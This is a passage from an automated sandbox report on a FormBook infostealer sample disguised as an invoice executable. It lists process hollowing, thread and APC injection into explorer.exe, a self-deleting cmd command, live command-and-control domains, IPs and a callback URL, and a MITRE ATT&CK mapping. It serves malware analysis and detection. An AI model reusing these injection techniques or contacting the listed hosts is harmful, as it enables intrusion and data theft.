          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034658EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03469080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0347EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0347FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03538F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0353070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0353070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0348F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034FFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034FFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03464F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03464F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03478794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03477E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03477E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03477E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03477E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03477E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03477E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0352AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0352AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0347766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0348AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0348AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0348AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0348AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0348AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0346C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0346C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0346C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03498E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03521608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0346E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0351FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03538ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034936CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0351FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034776E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034916E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034FFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03530EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03530EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03530EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03487D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0348C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0348C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03538D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0352E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03494D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03494D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03494D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0346AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034EA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03518DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0347D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0347D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0352FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0352FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0352FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0352FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03492581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03492581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03492581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03492581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03462D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03462D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03462D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03462D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03462D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034935A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03491DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03491DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03491DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_035305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_035305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034FC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PT300975-inv.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\PT300975-inv.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 156.241.53.196 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.244 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeThread register set: target process: 3440
          Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 3440
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: E30000
          Source: C:\Users\user\Desktop\PT300975-inv.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe'
          Source: explorer.exe, 00000003.00000000.359794599.0000000004F80000.00000004.00000001.sdmp, ipconfig.exe, 00000004.00000002.605713889.00000000046D0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.605084238.0000000000EE0000.00000002.00000001.sdmp, ipconfig.exe, 00000004.00000002.605713889.00000000046D0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000002.605084238.0000000000EE0000.00000002.00000001.sdmp, ipconfig.exe, 00000004.00000002.605713889.00000000046D0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000003.00000002.605084238.0000000000EE0000.00000002.00000001.sdmp, ipconfig.exe, 00000004.00000002.605713889.00000000046D0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\PT300975-inv.exeQueries volume information: C:\Users\user\Desktop\PT300975-inv.exe VolumeInformation
          Source: C:\Users\user\Desktop\PT300975-inv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\PT300975-inv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\PT300975-inv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\PT300975-inv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Users\user\Desktop\PT300975-inv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.345935550.000000000489F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.384973697.0000000004DD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.603415993.0000000000990000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.603938511.0000000000DF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.385166130.00000000050D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.604508928.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.mscorsvw.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.mscorsvw.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.345935550.000000000489F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.384973697.0000000004DD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.603415993.0000000000990000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.603938511.0000000000DF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.385166130.00000000050D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.604508928.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.mscorsvw.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.mscorsvw.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection512Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1Input Capture1Virtualization/Sandbox Evasion3Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion3Security Account ManagerProcess Discovery2SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Disable or Modify Tools1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection512LSA SecretsSystem Network Configuration Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsHidden Files and Directories1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobObfuscated Files or Information3Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Software Packing1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 323028 Sample: PT300975-inv.exe Startdate: 26/11/2020 Architecture: WINDOWS Score: 100 31 g.msn.com 2->31 39 Malicious sample detected (through community Yara rule) 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 Yara detected FormBook 2->43 45 4 other signatures 2->45 11 PT300975-inv.exe 1 2->11         started        signatures3 process4 file5 29 C:\Users\user\...\PT300975-inv.exe.log, ASCII 11->29 dropped 55 Hides that the sample has been downloaded from the Internet (zone.identifier) 11->55 15 mscorsvw.exe 11->15         started        signatures6 process7 signatures8 57 Modifies the context of a thread in another process (thread injection) 15->57 59 Maps a DLL or memory area into another process 15->59 61 Sample uses process hollowing technique 15->61 63 2 other signatures 15->63 18 explorer.exe 15->18 injected process9 dnsIp10 33 www.asacal.com 156.241.53.196, 49755, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 18->33 35 www.solidconstruct.site 198.54.117.244, 49750, 80 NAMECHEAP-NETUS United States 18->35 37 3 other IPs or domains 18->37 47 System process connects to network (likely due to code injection or exploit) 18->47 22 ipconfig.exe 18->22         started        signatures11 process12 signatures13 49 Modifies the context of a thread in another process (thread injection) 22->49 51 Maps a DLL or memory area into another process 22->51 53 Tries to detect virtualization through RDTSC time measurements 22->53 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PT300975-inv.exe21%ReversingLabsByteCode-MSIL.Trojan.Razy

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.2.mscorsvw.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.asacal.com/jqc/?JfEtEZgp=cE9UUOc3pLPT0LAdHSIP3evlMF3IBhbdmq5wG0CQLEBsctkiCkQzhS7S4EgmhhRecsIvRlsotA==&ojq0s=RzulsD0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.solidconstruct.site
          		198.54.117.244
          		truetrue
            		unknown
            www.asacal.com
            		156.241.53.196
            		truetrue
              		unknown
              www.hongreng.xyz
              		unknown
              		unknowntrue
                		unknown
                g.msn.com
                		unknown
